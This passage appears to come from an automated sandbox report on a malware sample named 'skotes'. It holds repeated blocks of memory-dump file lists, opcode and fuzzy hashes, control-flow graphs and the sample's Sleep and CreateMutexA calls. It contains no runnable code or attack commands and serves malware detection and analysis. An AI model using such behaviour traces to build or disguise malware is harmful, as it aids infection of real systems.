                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: edc43345af44af92dced8f23810da4c5ad7d4b9fa441c572ea0d97a2a66654a2
                                                                                                                                                                    • Instruction ID: cb8b40862f060b34319cc8d31b87812fd63251b9958e8dbf832895a48474776a
                                                                                                                                                                    • Opcode Fuzzy Hash: edc43345af44af92dced8f23810da4c5ad7d4b9fa441c572ea0d97a2a66654a2
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A312831A011409FEB08DBBCDC897EDB763AF86310F288658E064D73D5D7759AC48752
                                                                                                                                                                    Function 0061A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 124 61a418-61a438 128 61a466-61a482 124->128 129 61a43a-61a446 124->129 130 61a4b0-61a4cf 128->130 131 61a484-61a490 128->131 132 61a448-61a456 129->132 133 61a45c-61a463 call 62d663 129->133 137 61a4d1-61a4dd 130->137 138 61a4fd-61a916 call 6280c0 130->138 135 61a492-61a4a0 131->135 136 61a4a6-61a4ad call 62d663 131->136 132->133 139 61a93f-61a949 call 646c6a * 2 132->139 133->128 135->136 135->139 136->130 143 61a4f3-61a4fa call 62d663 137->143 144 61a4df-61a4ed 137->144 155 61a94e 139->155 156 61a949 call 646c6a 139->156 143->138 144->139 144->143 157 61a953-61a994 Sleep CreateMutexA 155->157 158 61a94e call 646c6a 155->158 156->155 160 61a9a7-61a9a8 157->160 161 61a996-61a998 157->161 158->157 161->160 162 61a99a-61a9a5 161->162 162->160
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: a93ebafe9977e45853802c00c6cb7d5fa025306beaad41c93972c666a2bae815
                                                                                                                                                                    • Instruction ID: 02d5918beca6bdc210fdd217232463673889c1290d2865f71935c309f7b4ca67
                                                                                                                                                                    • Opcode Fuzzy Hash: a93ebafe9977e45853802c00c6cb7d5fa025306beaad41c93972c666a2bae815
                                                                                                                                                                    • Instruction Fuzzy Hash: 79312731A011009BEB089BBCD889BEDB6A3DF82314F288658E0A4DB3D5D7B559C08657
                                                                                                                                                                    Function 0061A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 164 61a54d-61a56d 168 61a59b-61a5b7 164->168 169 61a56f-61a57b 164->169 172 61a5e5-61a604 168->172 173 61a5b9-61a5c5 168->173 170 61a591-61a598 call 62d663 169->170 171 61a57d-61a58b 169->171 170->168 171->170 178 61a944-61a949 call 646c6a 171->178 176 61a632-61a916 call 6280c0 172->176 177 61a606-61a612 172->177 174 61a5c7-61a5d5 173->174 175 61a5db-61a5e2 call 62d663 173->175 174->175 174->178 175->172 182 61a614-61a622 177->182 183 61a628-61a62f call 62d663 177->183 191 61a94e 178->191 192 61a949 call 646c6a 178->192 182->178 182->183 183->176 195 61a953-61a994 Sleep CreateMutexA 191->195 196 61a94e call 646c6a 191->196 192->191 198 61a9a7-61a9a8 195->198 199 61a996-61a998 195->199 196->195 199->198 200 61a99a-61a9a5 199->200 200->198
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 404a91c11c307151f676115bc68c9112403297ac1422d925bc398be18bbf2d59
                                                                                                                                                                    • Instruction ID: 2c33bf6a136d8edfa074e7b5a047f901d265352db0efea0fd3170ac3ec9ac4ec
                                                                                                                                                                    • Opcode Fuzzy Hash: 404a91c11c307151f676115bc68c9112403297ac1422d925bc398be18bbf2d59
                                                                                                                                                                    • Instruction Fuzzy Hash: 48310931A051408BEB08DBBCDD857EDB7639B86314F288658E064DB3D6C77599C08757
                                                                                                                                                                    Function 0061A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 202 61a682-61a6a2 206 61a6d0-61a6ec 202->206 207 61a6a4-61a6b0 202->207 210 61a71a-61a739 206->210 211 61a6ee-61a6fa 206->211 208 61a6b2-61a6c0 207->208 209 61a6c6-61a6cd call 62d663 207->209 208->209 214 61a949 208->214 209->206 212 61a767-61a916 call 6280c0 210->212 213 61a73b-61a747 210->213 216 61a710-61a717 call 62d663 211->216 217 61a6fc-61a70a 211->217 219 61a749-61a757 213->219 220 61a75d-61a764 call 62d663 213->220 221 61a94e 214->221 222 61a949 call 646c6a 214->222 216->210 217->214 217->216 219->214 219->220 220->212 227 61a953-61a994 Sleep CreateMutexA 221->227 228 61a94e call 646c6a 221->228 222->221 234 61a9a7-61a9a8 227->234 235 61a996-61a998 227->235 228->227 235->234 236 61a99a-61a9a5 235->236 236->234
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 6e6d79bf0e8090a788488d7364275ef98f58de713d94910d5d3e66d0cbb593bb
                                                                                                                                                                    • Instruction ID: 8d356c4ce1553365d407c83b21b9db6befdd88037e7693783eb6e5492912fa43
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e6d79bf0e8090a788488d7364275ef98f58de713d94910d5d3e66d0cbb593bb
                                                                                                                                                                    • Instruction Fuzzy Hash: 65312631A011008BEB089BBCDD89BEDB773DB82310F288A58E064DB3D5C7759AC08797
                                                                                                                                                                    Function 00619ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 238 619adc-619ae8 239 619aea-619af8 238->239 240 619afe-619d91 call 62d663 call 627a00 call 615c10 call 618b30 call 628220 call 627a00 call 615c10 call 618b30 call 628220 238->240 239->240 242 61a917 239->242 244 61a953-61a994 Sleep CreateMutexA 242->244 245 61a917 call 646c6a 242->245 250 61a9a7-61a9a8 244->250 251 61a996-61a998 244->251 245->244 251->250 253 61a99a-61a9a5 251->253 253->250
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
